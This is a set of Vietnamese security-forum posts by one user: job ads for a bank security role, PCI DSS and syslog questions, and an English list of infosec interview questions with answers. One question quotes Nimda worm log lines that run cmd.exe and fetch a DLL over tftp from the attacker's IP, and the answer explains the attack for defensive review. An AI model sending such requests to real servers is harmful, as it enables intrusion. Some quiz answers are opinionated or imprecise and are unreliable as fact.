Messages posted by: vikjava

TQN wrote:

Tới bây giờ, với tên tuổi, name, email address, IP của các thành viên STL mà Công An chúng ta không chụp tụi nó, còn chờ đợi thì thiệt là lạ ??????????????????????????????????????????????????????????????????

Tại sao Công An phải bắt tụi nó vậy anh TQN ?

Hi anh TQN,

Có cách nào đưa chú này vào "ăn cơm nhà nước" không anh? Mà anh "show" hết vậy không sợ "bức dây động rừng" ah.

Ar0 wrote:

Thời gian làm viêc : Bán thời gian

Mô tả công việc:
- Nghiên cứu, xây dựng hệ thống mạng
- Nghiên cứu, xây dựng các chính sách bảo mật mạng
- Nghiên cứu, xây dựng các hệ thống an toàn thông tin, giám sát an toàn thông tin, quản lý rủi ro.

.

Công việc như mô ta sao làm Bán thời gian đươc smilie

. Hợp đồng dạng cộng tác viên ah smilie

Có lẽ anh TQN chưa đăng ký dịch vụ chuyển tiền qua ebanking. Quy định ngân hàng nhà nước hiện nay đối với dịch vụ chuyển tiền qua ebanking phải dùng xác thực mạnh như sms hoăc token

Đối với SMS, trước có thông tin virus zeus có khả năng Defeated luôn. smilie

- Xin hỏi đối với trường hợp các chương trình antivirus đều không phát hiện được, không có khả năng RCE như anh TQN. Đối với người quản trị hệ thống cần thực hiện những phương thức nào để có thể kiện toàn bảo mật cho hệ thống.

Hi anh,

Vụ việc như thế nào mà anh nóng giận thế. Bớt nóng anh, làm vài lon ken cho hạ hoả

Dear all, Hạn chót ngày 28/05/2011

Dear all,

Hạn chót ngày 28/05/2011

Hi anh lq

- Đối với các ứng dụng, hệ điều hành, thiết bị những log nào mình cần lấy.

- Việc phân tích log tập trung vào những thành phần và yếu tố nào? Anh có một procedure nào về việc phân tích log không ah?

Phó Hồng Tuyết wrote:

Tui nhớ là bên DA không dùng windows 98 mà.

@vikjava đừng nói tui bên ATM vẫn dùng windows 98 nhá.

IKut3 nói chơi đó, IKut3 đòi tới 1200usd, bên chỗ tuyển dụng không trả nổi

Mình chỉ đăng tuyển giùm thui, có phỏng vấn ai đâu smilie

tanviet12 wrote:

Có khi nào nhân viên của anh vikjava và nhân viên của anh gamma95 "giao lưu " với nhau không nhỉ

Mình đăng tuyển giùm người khác, mình làm lính thì làm gì có nhân viên.

UP UP UP

Anh em HVA nhanh chân nhé.

E hèm, mình đã bàn với bác Bình rồi, gamma95 chỉ lo gái gú suốt ngày.

Muốn làm CEO cậu phải kinh qua rất nhiều món, đằng này chỉ có món gái gú và bida thì làm gì được.

Úi anh trình bày sao không hú em đi học với smilie

Deputy CISO smilie

, CISO là ai vậy anh smilie

hi daicamrtran

Theo mình thì không nên dùng BKAV tất cả mọi phiên bản. Cậu nên dùng kaspersky hoặc McAfee

http://www.nsslabs.com cậu có thể xem các report tại đây.

panfider wrote:

CV của mình : https://docs.google.com/document/d/1YM2SmgaXC0QV7xwYSoriBKj1MhmuEA-OhCZ9PRIrjBs/edit?hl=en

Cậu "nộp đơn" kiểu này ai mà tuyển smilie

Theo dõi trên HVA tớ thấy cậu hình như đang không có việc làm, chẳng có công ty nào tuyển dụng nếu cậu không có bằng cấp hoặc kinh nghiệm cả. Chỉ trừ khi có một người bảo lãnh cậu, thuyết phục đươc lãnh đạo và hội đồng nhân sự, trường hợp này cậu phải thật xuất sắc.

- Người ta thường nói cần gì bằng cấp, nhưng những ai không có bằng cấp thì phải nổ lực gấp 10 lần mới có chỗ đứng trong công việc. Bạn phải luôn nổ lực hết mình để chứng tỏ với mọi người, mình giỏi dù không có bằng cấp .... Một vài chia sẻ

Hi all,

Sinh Viên sắp ra trường là sinh viên đã và đang làm luận án tốt nghiệp nhé các bạn smilie

Chào các bạn,

Hiện tại 1 Bank tại TPHCM cần tuyển 02 nhân viên làm việc ở vị trí giám sát an toàn thông tin. Bạn nào muốn ứng tuyển vui lòng gửi CV (tiếng Anh hay tiếng Việt đều được) về địa chỉ email vikjava@yahoo.com.

1. Mô tả công việc: xây dựng và quản lý hệ thống giám sát an ninh cho Bank bao gồm:

- Xây dựng các công cụ cần thiết cho công việc giám sát an ninh.

- Quản trị với tiêu chí "tự động hóa" các bộ công cụ hỗ trợ việc giám sát an ninh.

- Tham gia xây dựng và triển khai các chính sách an toàn thông tin.

- Phân tích và xử lý sự cố an toàn thông tin.

2. Yêu cầu chuyên môn

- Thông thạo hệ điều hành *nix

- Kiến thức về cisco tương đương CCNA hoặc CCNP

- Có kiến thức về TCP/IP.

Không yêu cầu phải có các chứng chỉ chuyên nghiệp nhưng đó sẽ là một lợi thế nếu có.

3. Yêu cầu ngoài chuyên môn

- Nhiệt tình và say mê giải quyết các thử thách kỹ thuật.

- Có khả năng nghe nói tiếng Anh cũng sẽ được ưu tiên (vì thỉnh thoảng phải làm việc với chuyên gia nước ngoài)

- Tham gia tích cực các vụ ăn nhậu, hát hò với anh em.

- Ưu tiên sinh viên mới hay sắp ra trường.
[b]
4. Lương bổng

- Sinh viên mới ra trường: tối đa 7tr/tháng. Nếu đã có kinh nghiệm làm việc, thì căn cứ vào kinh nghiệm thực tế mà thỏa thuận.

- Định kỳ tăng lương: 1 năm/1 lần

- Lương tháng 13, thưởng tết dương lịch, thưởng tết âm lịch, thưởng cổ phiếu hàng năm, quyền mua cổ phiếu ưu đãi

- Thưởng Quý tùy theo kết quả kinh doanh của công ty.

5. Quyền lợi khác:

- Các phúc lợi mà Bank dành cho nhân viên: bảo hiểm xã hội, bảo hiểm y tế, nghỉ phép, du lịch nghỉ mát, đào tạo nghiệp vụ ngân hàng, cho vay ưu đãi...

- Làm việc trong một môi trường thân thiện và chia sẻ, với lãnh đạo xem công nghệ là công cụ chính để cạnh tranh và an toàn thông tin là vấn đề sống còn đối với sự thành bại của doanh nghiệp

- Phát triển nghề nghiệp: chúng tôi sẽ tạo điều kiện tối đa để bạn phát huy được hết khả năng của mình. Tùy theo năng lực và sở thích, chúng tôi luôn sẵn sàng tạo điều kiện để bạn có thể trao dồi thêm kiến thức cho các lĩnh vực và kỹ năng trong cũng như ngoài chuyên môn

- Công ty có trung tâm đào tạo, dạy về các kỹ năng quản lý, kỹ năng giao tiếp, kỹ năng trang điểm, nghiệp vụ ngân hàng, tiếng anh giao tiếp …tất cả đều FREE

Theo mình thì panfider nên học tập và tìm hiểu gì mà ngoài xã hội cần, công ty tại VN cần. Đôi khi thấy bạn giống bị ảo tưởng smilie

What is NMAP?
Security scanner originally written by Gordon Lyon (also known by his pseudonym Fyodor)

In a public key infrastructure (PKI), the authority responsible for the identification and authentication of an applicant for a digital certificate (i.e., certificate subjects) is called what?
Registration authority (RA)

What’s the difference between encryption and hashing?
Encryption is reversible, as long as you have the appropriate key/keys, and the size of the cyphertext roughly matches the size of the plaintext. With hashing the operation is one-way, and the output is of a fixed length that is usually much smaller than the input.

What’s the difference between Diffie-Hellman and RSA?
Diffie-Hellman is a key-exchange protocol, and RSA is an encryption/signing protocol.

What kind of attack is a standard Diffie-Hellman exchange vulnerable to?
Man-in-the-middle, as neither side is authenticated.

Cryptographically speaking, what is the main method of building a shared secret over a public medium?
Diffie-Hellman

What is Key Escrow?
(Also known as a fair cryptosystem) is an arrangement in which the keys needed to decrypt encrypted data are held in escrow so that, under certain circumstances, an authorized third party may gain access to those keys.

What does RSA stand for?
I would be surprised if someone knew this answer: Rivest – Shmair – Adleman for Ronald L. Rivest, Adi Shamir and Leonard M. Adleman

What is DES?
Data Encryption Standard is a block cipher (a form of shared secret encryption)

What is Triple DES?
Common name for the Triple Data Encryption Algorithm (TDEA) block cipher. Applies the DES cipher algorithm three time to each data block to increase the key size.

What is the difference between Symmetric and Asymmetric?
Single key vs. two keys

In public-key cryptography you have a public and a private key, and you often perform both encryption and signing functions. Which key is used for which?
You encrypt with the other person’s public key, and you sign with your own private.

If you had to both encrypt and compress data during transmission, which would you do first, and why?
Compress then encrypt. If you encrypt first you’ll have nothing but random data to work with, which will destroy any potential benefit from compression.

How does HTTP handle state?
It doesn’t, that’s why cookies were invented.

What port does ping work over?
ICMP is layer 3 and doesn’t use ports

How exactly does traceroute/tracert work at the protocol level?
Many people think that it first sends a packet to the first hop, gets a time. Then it sends a packet to the second hop, gets a time, and keeps going until it gets. The extra credit is the fact that Windows uses ICMP by default while Linux uses UDP.

What exactly is Cross Site Scripting?
A type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users.

What’s the difference between stored and reflected XSS?
Stored is on a static page or pulled from a database and displayed to the user directly. Reflected comes from the user in the form of a request (usually constructed by an attacker), and then gets run in the victim’s browser when the results are returned from the site.

What are the common defenses against XSS?
Input Validation/Output Sanitization, with focus on the latter.

What is Cross-Site Request Forgery?
When an attacker gets a victim’s browser to make requests, ideally with their credentials included, without their knowing. A solid example of this is when an IMG tag points to a URL associated with an action, e.g. http://foo.com/logout/. A victim just loading that page could potentially get logged out from foo.com, and their browser would have made the action, not them (since browsers load all IMG tags automatically).

How does one defend against CSRF?
Logging out of sites and avoiding their “remember me” features can mitigate CSRF risk; not displaying external images or clicking links in “spam” or untrusted e-mails may also help. Requiring authentication in GET and POST parameters, not only cookies; Checking the HTTP Referer header; Ensuring there’s no crossdomain.xml file granting unintended access to Flash movies; and Limiting the lifetime of authentication cookies

What kind of network (lab) do you have at home?
I’ve yet to meet a serious security guy who doesn’t have a considerable home lab or network

As a corporate Information Security professional, what’s more important to focus on: threats or vulnerabilities?
Opinion-based, but the correct answer should be vulnerabilities as this what we can control in a corporate environment as we have little control over the threats.

What’s the difference between a risk and vulnerability?
If a CISSP gets this wrong, move along. Risk is dependent on a vulnerability where as a vulnerability is a weakness and risk is threat of an action or event.

What is a Buffer Overflow?
An anomaly where a process stores data in a buffer outside the memory the programmer set aside for it

What is a NOP Sled?
A sequence of NOP (no-operation) instructions (on x86 opcode 0×90) meant to “slide” the CPU’s instruction execution flow to its final, desired, destination.

Someone wants to test out a new product that works on a wireless network, how would you advise them to test out the product?
This will give the you a really good idea on how well wireless security is known by the candidate as well as how much they are willing to work with the business to test the new product. If they come up with a clean segregated network to test on that does not touch the main corporate network, or links to the internet in a DMZ type situation, that is promising. If they ask for a Faraday Cage, you might not have a winner here.

A business team has developed this brand new web site that you just tested and found a number of XSS errors in, how would you handle that?
This will let the interviewer know if the candidate has any idea about web security and development. If they offer to work with the developers to solve the issue you have a good candidate, if the candidate says it is the developer’s problem, and that they cannot help them or the business, then this might not be the candidate for you.

Ask candidate to “Design a secure network”.
This is meant to see how the candidate thinks, you can add something like design a secure network between two offices that is also optimized or has QoS for various protocols.

Ask how they would they securely link two offices together?
· Protocol stack
· VPN solutions
· You might want to include trusted partners.

What is your Blog URL?
If they have a blog then you need to know what they blog about, if they blog about tech that means they live, eat and breath this stuff, and that is good. If they are slamming on their co-workers, families, friends, or general how they pulled one over on someone, this might not be the person for you.

What is your MySpace page?
You have to ask this one for the same reason that you ask what their blog URL is, do they meet the needs of the company. I tend to dismiss the use of MySpace as something that I wouldn’t want to have or know someone that uses it, but that’s my opinion.

What papers have you written?
The answer to this is the same as the blog, if they don’t blog, and they don’t write then ask them what they are reading in the news, are they staying up on the technology, if not, you might not have a winner here.

What is the secret sauce to a Cisco command?
This will let you know if they have any hands on with a Cisco device at all, this can be important depending on what the security engineer will be doing. BTW the answer is TAB.

What do you think of Teams?
This is the ultimate people question; if they say they like teams, ask them why. If they say they like people, ask them why, what is it that drives their relationships with others. This opens up a whole line of questioning about how well they like people, how well they can train others, and their viewpoints on working with others. You really do want a social person or at least a person sociable enough for the company.

What is the security threat level today at the Internet Storm Center (ISC)?
You should know that it’s almost always Green

Are they in touch with the current situation? Ask them what their favorite security web sites are.
You should at least hear one you already read, if not check them out (write them down) and see what they are like, are they deep geek techno security, or are they fluff fox news kind of stuff.

Hand them a security scan of a network and ask them to interpret it.
This is always good to see if they know what they are looking at, and can derive information from it.

Hand them a web site security scan and ask them to interpret it.

This is always good to see if they know what they are looking at, and can derive information from it

Show them a security policy from the company, and ask how they would enforce it.
This is always good, you find out what kind of leader they are, do they intend on teaching and enforcement, or do they go right to punitive damages

Show them a hack attack against something, down to the packet level, and ask what they would do. You have to hand them the entire attack, not just snippets of info. Find out what they know and can they interpret information well enough to be of use to the employer.

What is their dream information security job?
This is always good to find out how ambitious they are, where they see themselves in a while, and determine to see if there is a good fit between the job and the candidate.

Ask them to explain SOX, HIPAA, PCI and GLB (if applicable).

What do you see as the most critical and current threats effecting Internet accessible websites?
Goal of question is to gauge the applicants knowledge of current web related threats. Topics such as Denial of Service, Brute Force, Buffer Overflows, and Input Validation are all relevant topics. Hopefully they will mention information provided by web security organizations such as the Web Application Security Consortium (WASC) or the Open Web Application Security Project (OWASP).

What do you see as challenges to successfully deploying/monitoring web intrusion detection?
You are attempting to see if the applicant has a wide knowledge of web security monitoring and IDS issues such as:
· Limitations of NIDS for web monitoring (SSL, semantic issues with understanding HTTP)
· Proper logging increasing the verboseness of logging (Mod_Security audit_log)
· Remote Centralized Logging
· Alerting Mechanisms
· Updating Signatures/Policies

What are the most important steps you would recommend for securing a new web server?
There is no right or wrong answer. However, the following are good starting points:
· Update/Patch the web server software
· Minimize the server functionality disable extra modules
· Delete default data/scripts
· Increase logging verboseness
· Update Permissions/Ownership of files

What are the most important steps you would recommend for securing a new Web application?
· Make sure Input Validation is enforced within the code – Security QA testing
· Ensure application is configured to display generic error messages
· Implement a software security policy
· Remove or protect hidden files and directories

Imagine that we are running an Apache reverse proxy server and one of the servers we are proxy for is a Windows IIS server. What does the log entry suggest has happened? What would you do in response to this entry?

68.48.142.117 – - [09/Mar/2004:22:22:57 -0500] “GET /c/winnt/system32/ cmd.exe?/c+dir HTTP/1.0″ 200 566 “-” “-”
68.48.142.117 – - [09/Mar/2004:22:23:48 -0500] “GET /c/winnt/system32/ cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:\\httpodbc.dll HTTP/1.0″ 200 566 “-” “-”

You will know if the applicant is fluent at reading web server log files in the Common Log Format (CLF). In this scenario, the client system (68.48.142.117) is infected with the Nimda worm. These requests will not affect our Apache proxy server since this is a Microsoft vulnerability. While it does not impact Apache, the logs do indicate that the initial request was successful (status code of 200). The Nimda worm will only send the level 2 request (trying to use Trivial FTP to infect the target) if the initial request is successful. Depending on the exact proxying rules in place, it would be a good idea to inspect the internal IIS server to verify that it has not been compromised.

What is SSL?
SSL is cryptographic protocols that provide security and data integrity for communications over networks such as the Internet. TLS and SSL encrypt the segments of network connections at the Transport Layer end-to-end.

How do you create SSL certificates, generically speaking?
To create a certificate, you generate a private key, generate a Certificate Signing Request, Generate and install the Certificate.

What is DNS Hijacking?
DNS hijacking is the practice of hijacking the resolution of DNS names to IP addresses by the use of rogue DNS servers, particularly for the practice of phishing

What are IDA and/or Olly?
Debuggers

Have you hacked any system?
This is a unique question in that for some companies the answer should always be “NO” as many companies has hire-no-hacker policy. If they start answering by indicating a legal or ethical engagement, then you might want to delve into this a little more.

Have you released any worm/trojan/malicious code in the wild?
Most definitely this answer should always be “NO.”

If i give you two dlls of different versions, one has the vulnerability and another is patched for that vulnerability then how will you find the vulnerability?
· Load them up in a debugger to determine which is which.· Validate the vulnerability by Googling, Microsoft, Secunia, etc.

What is the latest security breach you’re aware of?
· The goal is to gauge if the candidate is up on data breach disclosure.

Can a Virtual Operating System be compromise?
· The obvious answer is yes, so mix it up with a follow-up about the Host operating system being compromised from a guest. If they have no idea what a guest or host is then they don’t understand Virtualization security.

What sort of test would you perform to understand a virus?
· The idea here is to see if the candidate has an understanding of using a sandbox or external website for virus analysis.

What is UPX?
· The Ultimate Packer for eXecutables, is a free and open source executable packer supporting a number of file formats from different operating systems.

What is meterpreter?
· Meterpreter is a command line program that extends the functionality of Metasploit.

What is LDAP?
· LDAP (Lightweight Directory Access Protocol) is a protocol for communications between LDAP servers and LDAP clients. LDAP servers store “directories” which are access by LDAP clients.

Why LDAP called Light weight?
· LDAP is called lightweight because it is a smaller and easier protocol which was derived from the X.500 DAP (Directory Access Protocol) defined in the OSI network protocol stack.

What are the standard port numbers for SMTP, POP3, IMAP4, RPC, LDAP and Global Catalog?
· The standard port numbers are respectively SMTP 25,POP3 110, IMAP4 143,RPC 135,
LDAP 636,GLOBAL CATALOG 3269

How will you determine if a file is packed or not?
· There are numerous tools available to determine what packed a file: PEiD is a common tool that detects a large number of packers.
· File Checksum Checking Services
· Cumulative Anti Virus Testing: Virus Total , NoVirusThanks, Threat Expert, and Jotti

Do you have Rainbow tables?
This may or may not be of importance, but if you’re looking for a true pentester, the answer had better be yes.

What is dsniff?
This is a good question to determine what they know about network auditing and penetration testing tools.

Have you ever used FTK, Encase, dc3dd, dd_rescue or dcfldd?
This is used to determine if the candidate has any forensics experience.

Other than Wireshark, what sniffers have you used?
Here were looking for tcpdump, or something commercial.

Tell me what you know about Sleuthkit.
Sleuthkit is an open source disk analysis/forensics frontend for autopsy.

With regard to forensics, what is physically different about how the platters are used in a 3.5” and a 2.5” HDD?
The platters are written outside to inside on a 3.5” drive, where they inside (closest to the spindle) is written first on a 2.5” drive.

What are DCO and HPA?
DCO is Device Configuration Overlay and HPA is Host Protected Area. These are areas on a hard drive that are designed to store information in such a way that it cannot be easily modified changed or access by the user, BIOS or OS.

Can DCO and HPA be changed?
There is a tool called TAFT that can do this by talking directly to the ATA controller. There are numerous tools to remove HPA and DCO.

Describe a time when you implemented defense in depth.
The goal here is to get the candidate to talk about multiple layers of security, like an onion.

What was the last course you attend? Where? When? Why?

Has the candidate attended any training recently?

Describe the last security implementation you were involved with.
The goal here is to get the candidate to talk about their involvement with the implementation of a security product, imitative or design.

Design a RADIUS infrastructure for 802.11 security and authentication.
Goal of question here is to gauge the applicant’s knowledge of RADIUS. Do they use Realms?

What was the last technical book you read?
Goal of question here is to gauge the applicants desire to gain knowledge outside of work.

What is your CISSP number?
Check the status of the candidate’s certification.

How would you decode the following packet in HEX?
4500 0036 308b 0000 4001 0000 7f00 0001 7f00 0001 0800 89f3 5a27 0200 3173 7432 444d 6d65 6765 7473 4153 7461 7262 7563 6b73 6361 7264

· Convert this from text to pcap using text2pcap, then open in Wireshark.

What is a honeypot?
A honeypot is a simply a system program or file that has absolutely no purpose in production. Therefore, we can always assume that if the honeypot is accessed, it is for some reason unrelated to your organization purpose.

Are there limitations of Intrusion Detection Signatures?
Signature based IDS provide a useful service to let an administrator know that he/she has been or is being attacked they should not be relied upon. It is far too easy to fool or shut down an IDS machine for them to be utilized as the primary line of defense against intruders.

What was ISO 17799 originally called?
BS 7799

What areas does ISO 27001 and 27002 cover?
ISO 27001 covers the requirements for Information security management systems. ISO 27002 covers the actual practice for information security management

Define an incident?
This is really a question that is intended to illicit the amount of knowledge as well as the ability to think quickly. Candidates should say something similar to an event that could or actually does have an adverse effect on a company, department, or system. A good follow-up is to ask for an example of an incident that they were involved with and how they handled it.

What is the difference between Encrypting and Encoding?
In the simplest terms, it’s the lack of a key.

What can protect you 100% from attack?
If the candidate says any of the following you need to end the interview: Firewalls, AV, IDS/IPS, Encryption, policies. The point is there isn’t anything that can protect you 100% of the time.

Cảm ơn Ky0shir0 đã cung cấp những cuốn sách về security cho anh em tham khảo

punkrock wrote:

Thấy ngân hàng MB dùng service của bọn Controlcase. Chắc là phải có uy tín thì họ mới dùng

punkrock hình như cũng đang tìm hiểu chuẩn này, "họ" có bao gồm punkrock trong đó không ta

Nhiều lựa chọn là như thế nào vậy BOOB. Mình không hiểu câu hỏi của BOOB lắm. thân

p/s: hình như BOOB là anh chàng to con, xung phong hát bài gì đó hồi gặp đơt anh conmale về phải không ta.

Hi all,

- Khi tìm hiểu triển khai PCI DSS, thông tin ban đầu thì có chú OnePay làm đối tác của Trustware. Việc triển khai PCI DSS có lẽ OnePay là đơn vị đầu tiền tại việt nam. Tuy nhiên, hiện nay việc triển khai PCI DSS có thể trở thành "cuộc đua" của nhiều người và theo thông tin nhận được thì OnePay ( Trustware) không phải là lựa chọn số một.

- Tham khảo tại website https://www.pcisecuritystandards.org/approved_companies_providers/qsa_companies.php#

Place of Business : vietnam thì có 4 công ty
http://www.controlcase.com/
http://www.riskassociates.com.au/
http://www.sisa.co.in/
http://www.verizonbusiness.com/

- Mọi người cho mình hỏi thông tin chi tiết về 4 đơn vi trên ? Tốt ? Uy tín ? So với Trustware thì như thế nào?....
- Nếu lựa chọn một trong 4 đơn vi trên thay vì OnePay(Trustware) thì sẽ có lợi gì, hại gì?

p/s: Thật ra Onepay chỉ làm nhiệm vụ duy nhất là đơn vị trung gian ký hợp đồng và nhận tiền giùm Trusware, ngoài ra Onepay chỉ hỗ trợ về mặt phiên dịch smilie

. Tất cả là từ phía Trustware

lQ wrote:

em đã thử restart zimbra chưa.

Ngoài ra syslog-ng mới có nhận được local log (sshd, cron, kernel...) hay không?

Theo anh biết thì 1 số service của zimbra ko support syslog mà chỉ lưu file như các log Pop3SSLServer, Pop3Server, btpool0... nên syslog hay syslog-ng đều ko thể nhận được log này. Còn các service khác của zimbra như postfix, amavis thì có hỗ trợ.

Dear anh,

- Em đã restart zimbra rùi, khi có syslog-ng thì trong /var/log/zimbra.log ( MTA,spamfilter...)không có thông tin gì cả. Các log khác của zimbra vẫn bình thường

-Các log về sshd, cron,kernel vẫn bình thường.

- Trước mắt em chỉ cần thu thập các critical log để phục vụ vu PCI DSS smilie

lQ wrote:

Theo anh biết thì 1 số service của zimbra ko support syslog mà chỉ lưu file như các log Pop3SSLServer, Pop3Server, btpool0... nên syslog hay syslog-ng đều ko thể nhận được log này. Còn các service khác của zimbra như postfix, amavis thì có hỗ trợ.

Hi anh,

-Đúng như anh nói ở trên.

- So với nhu cầu đổ log về server log, việc cấu hình syslog-ng cho các service của zimbra hơi bị nhiêu khê và gặp nhiều trở ngại. Em đã remove syslog-ng và install lại sysklogd

- Hiện nay em muốn lấy các thông tin dưới đây để đổ vể log server, vậy syslog.conf có đáp ứng được hết không anh, cấu hình như thế nào để đáp ứng điều này ah?

Successful user login “Accepted password”, “Accepted publickey”,"session opened”

Failed user login “authentication failure”, “failed password”

User log-off “session closed”

User account change or deletion “password changed”,“new user”,“delete user”

Sudo actions “sudo: … COMMAND=…” “FAILED su”

Service failure “failed” or “failure”